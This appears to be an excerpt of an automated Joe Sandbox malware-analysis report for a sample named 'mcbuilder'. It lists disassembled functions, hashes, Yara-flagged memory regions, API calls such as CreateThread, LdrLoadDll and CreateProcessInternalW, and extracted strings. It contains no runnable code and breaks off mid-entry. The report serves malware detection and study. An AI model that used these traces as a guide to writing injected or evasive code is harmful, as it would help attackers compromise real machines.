                                                • API String ID: 2994545307-0
                                                • Opcode ID: d2521dd43f9215a9b32f1f27d4968e37919377112b006fc84e7a4cc47cc6ba30
                                                • Instruction ID: 40b01bda114e52a26455ca147544e396207afccdb08f0aad2763248a14233092
                                                • Opcode Fuzzy Hash: d2521dd43f9215a9b32f1f27d4968e37919377112b006fc84e7a4cc47cc6ba30
                                                • Instruction Fuzzy Hash: BF90026120180817D140B598480460B000587D1702F65C051A3068555E8B298D556136
                                                Function 038D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 39e3ec67badc4af311d5b3b7ad4911e5d60cd8f67a7808ef121db330c2b9e691
                                                • Instruction ID: 498111f7388b0468807327cdaf210c419ae533234f6b1f1d723faee8db6ca13b
                                                • Opcode Fuzzy Hash: 39e3ec67badc4af311d5b3b7ad4911e5d60cd8f67a7808ef121db330c2b9e691
                                                • Instruction Fuzzy Hash: 1A900221242445665545F198440450B400697E16417A5C052A2418950C8626995AD622
                                                Function 038D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a918508983d68eb49f3ba3e63e764ebae39a6f91c13cb341da4345243a7d9daf
                                                • Instruction ID: 373f15175d6682f8bbd1d0fc989697b3ade8cb5c857a559fa4c289b920f509a7
                                                • Opcode Fuzzy Hash: a918508983d68eb49f3ba3e63e764ebae39a6f91c13cb341da4345243a7d9daf
                                                • Instruction Fuzzy Hash: 1590023120140827D111B198450470B000987D1641FA5C452A1428558D97568A56A122
                                                Function 038D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 74fdac14f4eb93b5816de5abf340b20370c87c82fe6f0b75b1a305f18666122c
                                                • Instruction ID: 3f184bc9febcb9bb9313dc1690d142a30adb5fcc015f98cb3d6859b68d50b454
                                                • Opcode Fuzzy Hash: 74fdac14f4eb93b5816de5abf340b20370c87c82fe6f0b75b1a305f18666122c
                                                • Instruction Fuzzy Hash: 6890022921340416D180B198540860E000587D2602FA5D455A1019558CCA15896D5322
                                                Function 038D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 56604912e534c2bea4db20a917b6096652fee1a47e2e726a23355ca71ac36d73
                                                • Instruction ID: 7ce067421b6950b4017d9f42c1372a07b5c1bf864241348f10e1da952906bed0
                                                • Opcode Fuzzy Hash: 56604912e534c2bea4db20a917b6096652fee1a47e2e726a23355ca71ac36d73
                                                • Instruction Fuzzy Hash: C990022130140417D140B198541860A4005D7E2701F65D051E1418554CDA15895A5223
                                                Function 038D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 88f2036912366d61cf92807d69c35e2512cc2f89110e80bac740b0c0d11d9701
                                                • Instruction ID: cc0f66a404d2e8622c2ad58cfa301862d9ddace65720fff901ed3b59f1e4027f
                                                • Opcode Fuzzy Hash: 88f2036912366d61cf92807d69c35e2512cc2f89110e80bac740b0c0d11d9701
                                                • Instruction Fuzzy Hash: D390023120140816D100B5D8540864A000587E1701F65D051A6028555EC76589956132
                                                Function 038D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c966447e13af7c910bff747fff7a60a1fe0b4a380e1944e2c6d297b35577f183
                                                • Instruction ID: 127c33f0999d2af0774e6aabbf006b3ec74b366fe64b80d06ef5aaea790f9904
                                                • Opcode Fuzzy Hash: c966447e13af7c910bff747fff7a60a1fe0b4a380e1944e2c6d297b35577f183
                                                • Instruction Fuzzy Hash: BF90023120140C56D100B1984404B4A000587E1701F65C056A1128654D8715C9557522
                                                Function 038D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 32d015375a4f4c3c3be96b18638cd6ab321640f11373fca6b8a228e5ea900c4c
                                                • Instruction ID: b55eee49a72315fe8b08caaeaeca1457a27bb895c46cced9c72b790ba1c38452
                                                • Opcode Fuzzy Hash: 32d015375a4f4c3c3be96b18638cd6ab321640f11373fca6b8a228e5ea900c4c
                                                • Instruction Fuzzy Hash: 9F90023120148C16D110B198840474E000587D1701F69C451A5428658D879589957122
                                                Function 038D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c7884717a535d928405cce1629a2bc96047b03f25839cc51ad4a98742896d3f2
                                                • Instruction ID: 444c0678fe992d325e8ae9f542da8ae0399b89817fea8334ba868fb0e6937e3c
                                                • Opcode Fuzzy Hash: c7884717a535d928405cce1629a2bc96047b03f25839cc51ad4a98742896d3f2
                                                • Instruction Fuzzy Hash: 1890023160550816D100B198451470A100587D1601F75C451A1428568D87958A5565A3
                                                Function 038D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 798fc88916f69d3f1873b7dd02537204ad7291908de8d182230958b1fb0067ad
                                                • Instruction ID: 3dc14f93dfba07ef499b57ef290673dad8a2ea4c3fee9e1412106f8965d6d33d
                                                • Opcode Fuzzy Hash: 798fc88916f69d3f1873b7dd02537204ad7291908de8d182230958b1fb0067ad
                                                • Instruction Fuzzy Hash: F390022124545516D150B19C440461A4005A7E1601F65C061A1818594D865589596222
                                                Function 03099B16 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 136threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 36 3099b16-3099b1e 37 3099b20-3099e28 36->37 38 3099ad2-3099af1 call 30b1a50 36->38 39 3099e39-3099e45 37->39 46 3099b10-3099b15 38->46 47 3099af3-3099b0f call 30bc387 CreateThread 38->47 41 3099e58-3099e68 39->41 42 3099e47-3099e56 39->42 41->41 45 3099e6a 41->45 42->39 49 3099e71-3099e7b 45->49 51 3099e7d-3099e89 49->51 52 3099eb6-3099ec7 49->52 54 3099e8b-3099e8f 51->54 55 3099e90-3099e92 51->55 53 3099ed8-3099ee1 52->53 58 3099ef1-3099f02 53->58 59 3099ee3-3099eef 53->59 54->55 56 3099ea5-3099eae 55->56 57 3099e94-3099ea3 55->57 60 3099eb4 56->60 57->60 61 3099f13-3099f1f 58->61 59->53 60->49 63 3099f21-3099f33 61->63 64 3099f35-3099f3e 61->64 63->61 65 309a148-309a14f 64->65 66 3099f44-3099f4e 64->66 68 309a151-309a15b 65->68 69 309a1c5-309a1cf 65->69 70 3099f5f-3099f68 66->70 73 309a16c-309a175 68->73 71 3099f6a-3099f7c 70->71 72 3099f7e-3099f91 70->72 71->70 77 3099fa2-3099fae 72->77 75 309a18b call 30ba9c0 73->75 76 309a177-309a189 73->76 83 309a190-309a19a 75->83 79 309a15d-309a166 76->79 80 3099fc1-3099fcb 77->80 81 3099fb0-3099fbf 77->81 79->73 84 3099fdc-3099fe8 80->84 81->77 85 309a1ab-309a1b4 83->85 86 3099ff9-309a000 84->86 87 3099fea-3099ff7 84->87 85->69 88 309a1b6-309a1c3 85->88 90 309a021-309a030 86->90 91 309a002-309a01f 86->91 87->84 88->85 93 309a068-309a06f 90->93 94 309a032-309a03c 90->94 91->86 95 309a071-309a094 93->95 96 309a096-309a09d 93->96 97 309a04d-309a056 94->97 95->93 98 309a09f-309a0cc 96->98 99 309a0ce-309a0d8 96->99 100 309a058-309a061 97->100 101 309a063 97->101 98->96 103 309a0e9-309a0f2 99->103 100->97 101->65 104 309a108-309a10e 103->104 105 309a0f4-309a106 103->105 107 309a112-309a11e 104->107 105->103 108 309a120-309a141 107->108 109 309a143 107->109 108->107 109->64
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03099B05
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID: $v$&!$*-$2M$9h$=C$>M$G$J$NA$P~$R~$Ud$V$[*$[/$`$ht$oA$x$z$}$~*
                                                • API String ID: 2422867632-2677354048
                                                • Opcode ID: 8d5f8270bfd4235900d61818a203eaf8735bf8a2a01f29014bbf37873d5bc5ed
                                                • Instruction ID: 5cead3d11fd04366124263d3158fffafce23cec9a436fe68e16183bdc25c5dfc
                                                • Opcode Fuzzy Hash: 8d5f8270bfd4235900d61818a203eaf8735bf8a2a01f29014bbf37873d5bc5ed
                                                • Instruction Fuzzy Hash: 5E816DB0D06668CBEB60CF81C9587DEBBB1BB45309F1081C9D15D3B281D7BA1A89CF95
                                                Function 030A0B6E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 0-4267580142
                                                • Opcode ID: 4cd0503204af95d54c07f702cae56d8d167117bd109d729d67297e97c164725b
                                                • Instruction ID: b405b7922e9ce49eba0309b375ee46afcd63337a5473e80b4f4a3fd9a7df8e45
                                                • Opcode Fuzzy Hash: 4cd0503204af95d54c07f702cae56d8d167117bd109d729d67297e97c164725b
                                                • Instruction Fuzzy Hash: B4215C72A0A64EBFDB21DB9CAC819EEBBBCEF81514B444259E554DB140D3365C12C7E0
                                                Function 030A0BA2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 030A0C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 1d651c1194d2a3eadd96c5eae92e4cdbb4f98317b1bc6ae72f504a953765acb9
                                                • Instruction ID: d42e6f32386c89ea4ab70019b2eab6b26f356188de636a31af3bc51bd368fe78
                                                • Opcode Fuzzy Hash: 1d651c1194d2a3eadd96c5eae92e4cdbb4f98317b1bc6ae72f504a953765acb9
                                                • Instruction Fuzzy Hash: 0811D676D4624CBBDF10DBD8AC81DEEB77CEF80664F158195E904EB200D6765A068BA0
                                                Function 030A0BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 030A0C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 058576c14129df8b9d782bf43e05fd92112a3ab973b3769d3ae6280fb0efee6a
                                                • Instruction ID: b3b53b31f61d7d046ab8c83d5884b6139d44ab31617452c580ea63a6edd5f5cb
                                                • Opcode Fuzzy Hash: 058576c14129df8b9d782bf43e05fd92112a3ab973b3769d3ae6280fb0efee6a
                                                • Instruction Fuzzy Hash: 9D11E5B2D4220CBEEB10D7E49C81DEF7B7CDF41694F048165FA04AB140D6755E068BB1
                                                Function 030A0BE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 030A0C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 1f2dd26d3e569d984f086c3ab4398186aa34cc3851bdab4f2319c850c6a25781
                                                • Instruction ID: 22b8d035d38f79d8a2de2531ddf04c300be1c3d68bc1ccb039ff5aa3b8998643
                                                • Opcode Fuzzy Hash: 1f2dd26d3e569d984f086c3ab4398186aa34cc3851bdab4f2319c850c6a25781
                                                • Instruction Fuzzy Hash: 4301C4B6D0120C7AEB10EBE48C81DEF7B7CDF81694F048064FA04BB140E5755E068BB1
                                                Function 030B3380 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 030B345B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 833a7beef45bcb0bb492a8c6267be1a8c88a7dd8e67e648e13b477a6b8e0ea2c
                                                • Instruction ID: fa702ecaf109a863feb7e93f1860d02c8946177796a1c7f29a7980e086448567
                                                • Opcode Fuzzy Hash: 833a7beef45bcb0bb492a8c6267be1a8c88a7dd8e67e648e13b477a6b8e0ea2c
                                                • Instruction Fuzzy Hash: 823183B5A02705BBDB14DFA4C884FEBB7B8FB88710F54456DA61D6B240D770BA40CBA4
                                                Function 030A1B62 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 272COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,?,?,030B4F6E,030A1B53), ref: 030A1BB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID: F
                                                • API String ID: 2340568224-909703421
                                                • Opcode ID: 42c56e24e853aefa9ec4c1ba41db988a3db08652e2b85d4f6893706afe055cf6
                                                • Instruction ID: aa3b7768492e80dfb8ee4f5c8dcf01849f4adc816c037518921695cee01f6483
                                                • Opcode Fuzzy Hash: 42c56e24e853aefa9ec4c1ba41db988a3db08652e2b85d4f6893706afe055cf6
                                                • Instruction Fuzzy Hash: 8091B4B5C01718AADB25DFA4DC81FEEB7BDEF94304F048599E509AA141E7306B44CFA1
                                                Function 030AF319 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 030AF337
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 1f5c014d43f95c35e7f5732bd92f200eb03824f9628108117049976796c31276
                                                • Instruction ID: 68bd803631a8b6fd644ca2cb62b673c8d7c837dc86eb3d767b1dca20802e6519
                                                • Opcode Fuzzy Hash: 1f5c014d43f95c35e7f5732bd92f200eb03824f9628108117049976796c31276
                                                • Instruction Fuzzy Hash: C64133B6A0060AAFDB10DFD8DC809EEB7B9FF88304F148559E505EB214D775EA458BA0
                                                Function 030AF320 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 030AF337
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: b8e2a9bc7a01c87d4c2c7e3d300131b65d6a850b9c0b8c48134c5b11b9905be1
                                                • Instruction ID: 20bd7f26eee3cdd94a0451590460dcfe10f5d9d75bcff2b58d4b48d3131d27a6
                                                • Opcode Fuzzy Hash: b8e2a9bc7a01c87d4c2c7e3d300131b65d6a850b9c0b8c48134c5b11b9905be1
                                                • Instruction Fuzzy Hash: BD3130B6A0060AAFDB00DFD8DC809EFB7B9FF88304B108559E515EB214D775EE458BA0
                                                Function 030A4820 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030A4812
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                                                • Instruction ID: 352f4571efd798586b24ffe07e19e8e5542755fffd6abf804956ebb0561fda42
                                                • Opcode Fuzzy Hash: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                                                • Instruction Fuzzy Hash: 7F01F7B9D00249BFDB20DBE8EC41FDFBBB8DF45208F144195E94897241E630EA05CB91
                                                Function 030A47A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030A4812
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                                                • Instruction ID: 649d9f8a95cd7dce9fc27695ab26d14bdd87eaa7af00ae67034b4616189721ce
                                                • Opcode Fuzzy Hash: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                                                • Instruction Fuzzy Hash: 330121B9E0120DBBDF14EBE5EC41FDEB7B89B44608F044295E9099B240F671EB54CB91
                                                Function 030B9090 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,030A813E,00000010,?,?,?,00000044,?,00000010,030A813E,?,?,?), ref: 030B90F0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: aef7352e7393d5443ccc0b5acfa055d02e0a020d95f9c9e969a8298cb411fb91
                                                • Instruction ID: 8ae61a9540791b35fd9a79a28efded4c514203e78bb32c11918881f0ed6ce5ba
                                                • Opcode Fuzzy Hash: aef7352e7393d5443ccc0b5acfa055d02e0a020d95f9c9e969a8298cb411fb91
                                                • Instruction Fuzzy Hash: 3501D2B6210209BBCB44DE89DC80EEB77ADAFCC754F008108FA09E7241D630F851CBA4
                                                Function 03099AC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03099B05
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 97d41cd2c0b60530ada9ee538a96ce8ee90df784c3a7136aab04a040812068a5
                                                • Instruction ID: fc077cd6c45cc7fc8d223ba5a8f430688782f4a2f80eef7fcfc483efeee4e315
                                                • Opcode Fuzzy Hash: 97d41cd2c0b60530ada9ee538a96ce8ee90df784c3a7136aab04a040812068a5
                                                • Instruction Fuzzy Hash: 96F06D3738530476E730A1A99D02FD7B39CCBC5A61F140426FA0DEB1C0D9A6B44143F8
                                                Function 030A4842 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030A4812
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 738ca3b7c514936c4173a818d1e11c85168a86b6f21764aebb017d457081d771
                                                • Instruction ID: bfa16b32cec09bf73e34e8394dbdaae1079fd8e30d6debe15b4848ec0b7492ac
                                                • Opcode Fuzzy Hash: 738ca3b7c514936c4173a818d1e11c85168a86b6f21764aebb017d457081d771
                                                • Instruction Fuzzy Hash: 0CF0243D21544EAED750CE99EC40FCDBBA8EB05654F0443D9D9688B2C1D230E40DC380
                                                Function 030B9000 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D633B48D,00000007,00000000,00000004,00000000,030A402F,000000F4), ref: 030B903F
                                                Memory Dump Source
